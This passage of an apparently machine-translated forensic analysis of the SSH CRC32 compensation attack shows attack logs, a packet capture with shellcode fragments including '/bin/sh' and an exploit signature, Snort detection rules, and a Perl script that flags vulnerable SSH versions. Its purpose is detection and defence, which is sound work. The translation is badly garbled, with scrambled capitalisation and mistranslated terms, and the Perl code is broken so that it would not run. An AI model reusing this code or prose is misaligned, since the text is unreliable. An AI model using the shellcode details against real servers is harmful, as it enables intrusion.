NOV 1 18:48:11 Victim Sshd [9595]: log: connection from 10.10.10.10 port 33382

Nov 1 18:48:11 Victim sshd [9594]: Fatal: Local: Crc32 Compensation Attack: Network Attack Detected

Nov 1 18:48:11 Victim Sshd [9596]: log: connection from 10.10.10.10 Port 33383

NOV 1 18:48:11 Victim Sshd [9597]: log: connection from 10.10.10.10 port 33384

NOV 1 18:48:11 Victim Sshd [9596]: Fatal: Local: Crc32 Compensation Attack: Network Attack Detected

Nov 1 18:48:12 Victim Sshd [9598]: log: connection from 10.10.10.10 Port 33385

NOV 1 18:48:12 Victim Sshd [9597]: Fatal: Local: CRC32 Compensation Attack: Network Attack Detected

NOV 1 18:48:12 Victim Sshd [9599]: log: connection from 10.10.10.10 port 33386

Nov 1 18:48:12 Victim Sshd [9598]: Fatal: Local: CRC32 Compensation Attack: Network Attack Detected

NOV 1 18:48:12 Victim Sshd [9600]: log: connection from 10.10.10.10 port 33387

Nov 1 18:48:12 Victim Sshd [9599]: Fatal: Local: CRC32 Compensation Attack: Network Attack Detected

NOV 1 18:48:13 Victim Sshd [9601]: log: connection from 10.10.10.10 port 33388

Nov 1 18:48:13 Victim Sshd [9602]: log: connection from 10.10.10.10 Port 33389

NOV 1 18:48:13 Victim Sshd [9603]: log: connection from 10.10.10.10 port 33390

NOV 1 18:48:14 Victim Sshd [9604]: log: connection from 10.10.10.10 Port 33391NOV 1 18:48:14 Victim Sshd [9605]: log: connection from 10.10.10.10 port 33392

NOV 1 18:48:15 Victim Sshd [9606]: log: connection from 10.10.10.10 port 33393

Nov 1 18:48:15 Victim Sshd [9605]: Fatal: Local: Corrupted Check Bytes on Input.

NOV 1 18:48:15 Victim Sshd [9607]: log: connection from 10.10.10.10 port 33394

Nov 1 18:48:16 Victim Sshd [9608]: log: connection from 10.10.10.10 Port 33395

NOV 1 18:48:16 Victim Sshd [9609]: log: connection from 10.10.10.10 port 33396

Nov 1 18:48:16 Victim Sshd [9610]: log: connection from 10.10.10.10 Port 33397

Nov 1 18:48:17 Victim Sshd [9611]: log: connection from 10.10.10.10 port 33398

Nov 1 18:48:17 Victim Sshd [9611]: Fatal: Local: Corrupted Check Bytes on Input.

Nov 1 18:48:17 Victim Sshd [9612]: log: connection from 10.10.10.10 port 33399

Nov 1 18:48:18 Victim Sshd [9613]: log: connection from 10.10.10.10 Port 33400

NOV 1 18:48:18 Victim Sshd [9614]: log: connection from 10.10.10.10 port 33401

NOV 1 18:58:18 Victim Sshd [9614]: Fatal: Timeout Before Authentication.

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Pay attention to the last one of the log entries. If this vulnerability is successfully used, the authentication process will stop because

At this point shellcode's back door program has executed so that you can connect to the port for any operation. only

The problem is that the SSH daemon (at least ssh.com 1.2.31) will time when the authentication process is incomplete, resulting in

Close the open shell. Generally, there will be a 10-minute time airspace before listening to the parent process of the shell.

Network communication information analysis

=====================

Here, TCPDUMP uses TCPDUMP to intercept the attack behavior above, record information in sshdx.dump, can be used

The IDS intrusion detection system gains the attack flag information. If your IDS system does not support TCPDUMP files, you can use "TCPLay" [12] to convert TCPDUMP information.

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

# TCPDUMP -S1500 -W SSHDX.Dump IP Host 10.10.10.3 &

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

This makes it easy to view multiple connection information generated by the SSH daemon, using the "ngrep" [5] tool

Identify violent crack attack information for last connecting and inserting shellcode:

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

.

T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]

SSH-1.5-1.2.31.

T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]

SSH-1.5-openssh_2.2.0p1.

T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]

.......... Ga .. @ .......% .... `..p ..... D & .. 2. 7 # ... 1! ? .. cr) .8. ^. h .....

..I..b..9.f ........ n..0 ....: bah @ se..h ... (. D2.zg ..... . # ....... /. J

W ... o $ ... 6 ....... $ ... v ..; ... u. @ y.k2.p

. @ 7.wbby ... 1.i ..% "..... g * ggt (... m ........ [....... J ... <.

T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]

.......... Ga .. @ ..... `g.fg.g.!. I.} ..........._. E ... . = .. / .. 6 ....; ....)

T ..... | c ... # w./wve.cy .n ..... q.sc ....} .. "ngw" .... n ... / #. ....8x .. &. Z

.... q / ....... 8 ..

T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]

......... 4 ..

T 10.10.10.10:32957 -> 10.10.10.3:2222 [a]. W ... 2 ....... 2 ....... 2 ....... 2 ... .... 2 ....... 2 ....... 2 ....... 2 .......

2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2. ...... 2 ....... 2 ....

..2! ... 2 $ ... 2% ... 2 (... 2) ... 2, ...... 2 -...... 20 ... 21 ..

.... 24 ... 25 ... 28 ... 29 ... 2 <... 2 = ... 2 @ ... 2a ... 2D

... 2E ... 2H ... 2i ... 2L ... 2M ... 2P ... 2Q. ..... 2T ......

2U ... 2x ... 2y ... 2 / ... 2] ... 2` 2a .... ..2d ... 2e ....

..2h ... 2i ... 2L ... 2M ... 2P ... 2Q ... 2T ..... .2U ... 2X ..

.... 2y ... 2 | ... 2} ... 2 ....... 2 ....... 2 ... .2 ....... 2 ....... 2.

... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ... .... 2 ....... 2 .......

2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2. ...... 2 ....... 2 .....

..2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ...

.... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ..... ..2 ....... 2 ....... 2.

... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ... .... 2 ....... 2 .......

2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2. ...... 2 ....... 2 .....

..2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 2 ....... 3 ....... 3 ....... 3 ...

.... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 ..... ..3 ....... 3 ....... 3.

... 3 ....... 3 ....... 3 ....... 3 ....... 3 ... 3! ... ... 3 $ ... 3% ...

3 (... 3) ... 3, ... 3 -...... 30 ... 31 ... 34 ... ... 35 ... 38 ....

..39 ... 3 <... 3 = ... 3 @ ... 3a ... 3d ... 3e .. .... 3h ... 3i ..

.... 3l ... 3m ... 3p ... 3Q ... 3t ... 3u ... 3x ... ... 3y ... 3 /

... 3] ... 3` ... 3a ... 3D ........ 1 ... p}. @

T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]

... 3i ... 3l ... 3M ... 3P ... 3Q ... 3t ... 3u. ..... 3x ...

3y ... 3 | ... 3} ... 3 ....... 3 ....... 3 ....... 3 .. ..... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 .... ... 3 ....... 3 ....... 3 ....... 3 ....... 3 ...

.... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 ..... ..3 ....... 3 ....... 3.

...... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 ... .... 3 ....... 3 .......

3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3. ...... 3 ....... 3 .....

..3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 ...

.... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 3 ..... ..3 ....... 3 ....... 3.

... 3 ....... 3 ....... 3 ....... 3 ....... 3 ....... 4 ... .... 4 ....... 4 .......

4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4. ... 4 ....... 4 .....

..4 ....... 4 ....... 4 ....... 4 ....... 4 ... 4! ...... 4 $ ... 4% ... 4 (..

.... 4) ... 4, ... 4 -...... 40 ... 41 ... 44 ... 45 ... 48 ... 49

... 4 <... 4 = ... 4 @ ... 4a ... 4d ... 4e ..... .4h ... 4i ......

4L ... 4M ... 4P ... 4Q ... 4t ... 4u ... 4x ... 4y ... 4 / ....

..4] ... 4` ... 4a ... 4d ... 4e ... 4h ... 4i ... ... 4L ... 4m ..

.... 4p ... 4q ... 4t ... 4u ... 4x ... 4y ... 4 | .. .... 4} ... 4.

... 4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4 ... .... 4 ....... 4 .......

4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4. ... 4 ....... 4 .....

..4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4 ...

.... 4 ....... 4 ....... 4 ....... 4 ....... 4 ....... 4 ..... ..4 ....... 4 ....... 4.

...... 4 ....... 4 ....... 4 ....... 4 ......... 1 ... p}. @

.

T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]

................................................ ....................

................................................ ....................

................................................ ....................

................................................ ................................................ ......................................

................................................ ....................

................................................ ....................

................................................ ....................

..................... 1..f..1 ... c.]. C.] Km.m ... 1. Cf.] Fe09.m.

.E..e ..... m ..... cc .... c ... 1. 1.? ... a ... ^. U.1..f. .E ... m..u .......

./bin/sh.h0H0H0, 7350, ZIP / TESO! .................................. .

................................................ ....................

................................................ ....................

................................................ ....................

................................................ ....................

................................................ ....................

................................................ ....................

................................................ ....................

................................................ ....................

................................................ ....................

..................................................................

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Such an attack program can match the string "H0H0H0, 7350, ZIP / TESO!" [7] and NOP, etc.

The following feature strings are developed by Marty Roesch and Brian Caswell and can be used in Snort V1.8 or

Higher version [6]:

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = Alert TCP $ EXTERNAL_NET ANY -> $ HOME_NET 22 /

(MSG: "Exploit SSH CRC32 OVERFLOW / BIN / SH"; /

Flags: A ; Content: "/ bin / sh"; /

Reference: Bugtraq, 2347; Reference: CVE, CVE-2001-0144; /

ClasStype: shellcode-detect;)

Alert TCP $ EXTERNAL_NET ANY -> $ HOME_NET 22 /

(MSG: "Exploit SSH CRC32 OVERFLOW FILLER"; /

Flags: A ; Content: "| 00 00 00 00 00 00 00 00 00 00 00 |"; /

Reference: Bugtraq, 2347; Reference: CVE, CVE-2001-0144; /

ClasStype: shellcode-detect;)

Alert TCP $ EXTERNAL_NET ANY -> $ HOME_NET 22 /

(MSG: "Exploit SSH CRC32 overflow noop"; /

Flags: A ; Content: "| 90 90 90 90 90 90 90 90 90 90 90 |"; /

Reference: Bugtraq, 2347; Reference: CVE, CVE-2001-0144; /

ClasStype: shellcode-detect;)

Alert TCP $ EXTERNAL_NET ANY -> $ HOME_NET 22 /

(MSG: "Exploit SSH CRC32 overflow"; /

Flags: A ; Content: "| 00 01 57 00 00 18 |"; Offset: 0; DEPTH: 7; /

Content: "| | FF FF FF 00 00 |"; Offset: 8; DEPTH: 14; /

Reference: Bugtraq, 2347; Reference: CVE, CVE-2001-0144; /

ClasStype: shellcode-detect;)

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Identify if your host exists this vulnerability

===========================

You can use Jeremy Mates 'Scan_ssh.pl [8] and Niels Provos' Scanssh Scanner [9] to identify SSH services and their version.

Russell Fulton also announced a script Argus [10] to process logs, included in the appendix.

-------------------------------------------------- ----------------------------

reference

=========

[1] Portable Linux Amazing CD (PLAC) V2.9.1PRE2, by Fred Cohen

http://www.all.net/forensix/plac.html

[2] Netcat, by Der Hobbit

http://www.l0pht.com/~weld/netcat/

[3] Reverse Engineer's Query Tool

http://packetStorSecurity.org/linux/reverse-ENGINEERING/REQT-0.7f.tar.gz

[4] List open files (LSOF)

http://sunsite.securitycentralhq.com/mirrors/security/lsof/lsof.tar.gz

[5] ngrep, by Jordan Ritter

http://www.packetfactory.net/projects/ngrep/

[6] Snort

http://www.snort.org/

[7] 7350.org / 7350

http://www.7350.org/

http://www.team-teeso.org/about.php (See the bottom)

[8] Jeremy mat provided SSH_SCAN.PL

Http://sial.org/code/perl/scripts/ssh_scan.pl.html

[9] SCANSSH scanning program provided by Niels Provos

Http://www.monkey.org/~provos/scanssh/

[10] Argus - Network Transmission Review Tools

http://www.pl.freebsd.org/es/ports/net.html#argus-1.8.1

[11] TCPDUMP

http://staff.washington.edu/dittrich/misc/sshdx.dump

[12] TCPREPLAY

http://packages.debian.org/testing/net/tcpreplay.html

Appendix A

==========

Two scanning scripts are as follows

= - = - = - = - = - = - = - = - = - = - = - cut here - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

#! / usr / bin / perl

#

# ssh-report

#

# DAVE DITTRICH

# THU NOV 8 21:39:20 PST 2001

#

# Process Output of Scans for SSH Servers, with version Identifying

# Information, INTO TWO Level Break report format by ssh version. #

# This script operations on a list of scan results That LOOK

# Like this:

#

#% cat scanResults

# 10.0.0.1 Beavertail.dept.foo.edu ssh-1.5-1.2.31

# 10.0.0.2 lumpysoup.dept.foo.edu ssh-1.5-1.2.31

# 10.0.0.3 marktwain.dept.foo.edu ssh-1.99-openssh_2.5.2p2

# 10.0.0.4 junebug.dept.foo.edu ssh-1.5-1.2.31

# 10.0.0.10 Calvin.dept.foo.edu ssh-1.99-openssh_2.5.2p2

# 10.0.0.11 hobbes.dept.foo.edu ssh-1.99-openssh_2.1.1

# 10.0.0.20 Willow.dept.foo.edu ssh-1.99-openssh_2.9p2

# 10.0.0.21 Berry.dept.foo.edu ssh-1.99-openssh_2.9p2

# 10.0.0.23 Whimpy.dept.foo.edu ssh-1.99-openssh_2.9p2

#

# The resulting report (without the "-a" flag) Will Look Like this:

#

#% ssh-report

#

# Ssh-1.5-1.2.31 (affected)

# beavertail.dept.foo.edu (10.0.0.1)

# lPYSOUP.DEPT.FOO.EDU (10.0.0.2)

#junebug.dept.foo.edu (10.0.0.4)

#

#

# Ssh-1.99-openssh_2.1.1 (Affected)

# hobbes.dept.foo.edu (10.0.0.11)

#

# By Default, this Script Will Only Report On Those Systems That

# is running potentially vulnerable ssh servers. Use the "-a"

#botion to report on all servers. Use "grep -v" to filter out

# Hosts * Before * You Run Them Through this Reporting Script.

#

# Ssh servers are considered "affected" if the are know, by being

# listed in one or more of the folcoming references, to have the crc32

# Compensation Attack Detector VulneRability:

#

#

http://www.kb.cert.org/vuls/id/945216

#

http://www.securityfocus.com/bid/2347/

#

Http://xforce.iss.net/alerts/advise100.php

#

Http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm

#

# You also may need to adjut the logic below to lump systems

# iono the "unknown" Category Correctly (E.G., IF Your Server # HAS a Custom Version String, Access Control, ETC.)

#

# The list below of servers and potential vulnerability was deived by

# Summarizing EXISTING VERSIONS ON A SET OF Production Networks and

# Using the advisories and reference material listed above. you

# Should Update this List as new information is obtained, or if new

# Versions of the ssh server is Found On your network.

% affected =

'Unknown', 'unknown',

'Ssh-1.4-1.2.14', 'not affected',

'Ssh-1.4-1.2.15', 'not affected',

'SSH-1.4-1.2.16', 'Not affected',

'Ssh-1.5-1.2.17', 'not affected',

'Ssh-1.5-1.2.18', 'not affected',

'Ssh-1.5-1.2.19', 'not affected',

'SSH-1.5-1.2.20', 'Not affected',

'SSH-1.5-1.2.21', 'Not affected',

'SSH-1.5-1.2.22', 'Not affected',

'Ssh-1.5-1.2.23', 'not affected',

'Ssh-1.5-1.2.24', 'affected',

'Ssh-1.5-1.2.25', 'affected',

'SSH-1.5-1.2.26', 'Affected',

'Ssh-1.5-1.2.27', 'affected',

'Ssh-1.5-1.2.28', 'affected',

'SSH-1.5-1.2.29', 'Affected',

'SSH-1.5-1.2.30', 'Affected',

'Ssh-1.5-1.2.31', 'affected',

'SSH-1.5-1.2.31A', 'Not affected',

'SSH-1.5-1.2.32', 'Not affected',

'SSH-1.5-1.3.7', 'Not affected',

'Ssh-1.5-cisco-1.25', 'unknown',

'SSH-1.5-OSU_1.5alpha1', 'unknown',

'Ssh-1.5-openssh-1.2', 'affected',

'Ssh-1.5-openssh-1.2.1', 'affected', 'ssh-1.5-openssh-1.2.2', 'affected',

'Ssh-1.5-openssh-1.2.3', 'affected',

'Ssh-1.5-openssh_2.5.1', ​​'not affected',

'Ssh-1.5-openssh_2.5.1p1', 'not affected',

'Ssh-1.5-openssh_2.9p1', 'not affected',

'Ssh-1.5-openssh_2.9p2', 'not affected',

'SSH-1.5-Remotelyanywhere', 'Not Affected',

'SSH-1.99-2.0.11', 'Affected W / Version 1 Fallback',

'SSH-1.99-2.0.12', 'Affected W / Version 1 Fallback',

'SSH-1.99-2.0.13', 'Affected W / Version 1 Fallback',

'SSH-1.99-2.1.0.pl2', 'Affected W / Version 1 Fallback',

'SSH-1.99-2.1.0', 'Affected W / Version 1 Fallback',

'SSH-1.99-2.2.0', 'Affected W / Version 1 Fallback',

'SSH-1.99-2.3.0', 'Affected W / Version 1 Fallback',

'SSH-1.99-2.4.0', 'Affected W / Version 1 Fallback',

'SSH-1.99-3.0.0', 'Affected W / Version 1 Fallback',

'SSH-1.99-3.0.1', 'Affected W / Version 1 Fallback',

'Ssh-1.99-openssh-2.1', 'affected',

'Ssh-1.99-openssh_2.1.1', 'affected',

'Ssh-1.99-openssh_2.2.0', 'affected',

'Ssh-1.99-openssh_2.2.0p1', 'affected',

'Ssh-1.99-openssh_2.3.0', 'Not affected',

'Ssh-1.99-openssh_2.3.0p1', 'Not affected',

'Ssh-1.99-openssh_2.5.1', ​​'Not affected',

'Ssh-1.99-openssh_2.5.1p1', 'not affected',

'Ssh-1.99-openssh_2.5.1p2', 'not affected',

'Ssh-1.99-openssh_2.5.2p2', 'not affected',

'Ssh-1.99-openssh_2.9.9p2', 'not affected', 'ssh-1.99-openssh_2.9', 'not affected',

'Ssh-1.99-openssh_2.9p1', 'not affected',

'Ssh-1.99-openssh_2.9p2', 'not affected',

'Ssh-1.99-openssh_3.0p1', 'Not affected',

'SSH-2.0-1.1.1', 'unknown',

'SSH-2.0-2.3.0', 'Affected W / Version 1 Fallback',

'SSH-2.0-2.4.0', 'Affected W / Version 1 Fallback',

'SSH-2.0-3.0.0', 'Affected W / Version 1 Fallback',

'SSH-2.0-3.0.1', 'Affected W / Version 1 Fallback',

'Ssh-2.0-openssh_2.5.1p1', 'not affected',

'Ssh-2.0-openssh_2.5.2p2', 'Not affected',

'Ssh-2.0-openssh_2.9.9p2', 'Not affected',

'Ssh-2.0-openssh_2.9p2', 'not affected',

);

# Make Sure You Read The Code First.

& Iknowwhatimdoing ();

$ all , Shift (@argv) if $ argv [0] EQ "-a";

While (<>) {

CHOP;

S // S / / g;

($ IP, $ Host, $ Version) = Split ('', $ _);

# Adjust this to Identify other strings reported

# by Servers That Have Access Restrictions, ETC.

# in place and do not show a specific Version Number.

# The all fall Under the category "Unknown" in this case.

$ Version = "unknown"

IF ($ Version EQ "Couldn't" ||

$ Version EQ "Unknown" ||

$ Version EQ "You" ||

$ Version EQ "Timeout");

$ Server {"$ version: $ p"} = $ host;

}

Foreach $ I (Sort Keys% Server) {

($ Version, $ IP) = Split (":", $ i);

Next if ($ affected {$ version} EQ "Not Affected" &&! $ all);

Printf ("/ n / n% s) / n", $ version, $ affected {$ version})

IF ($ CURVER NE $ Version); $ CURVER = $ VERSION;

Print "" "$ server {$ I}." ($ IP) / N ";

}

exit (0);

Sub iknowwhatimdoing {

LOCAL $ IKNOWWHATIMDOING = 0;

# UNComment The Following Line to make this script work.

# $ I1whatimdoing ;

Die "I Told you to read the code first, Didn't i? / n"

Uns $ IKNOWWHATIMDOING

Return;

}

= - = - = - = - = - = - = - = - = - = - = - cut here - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =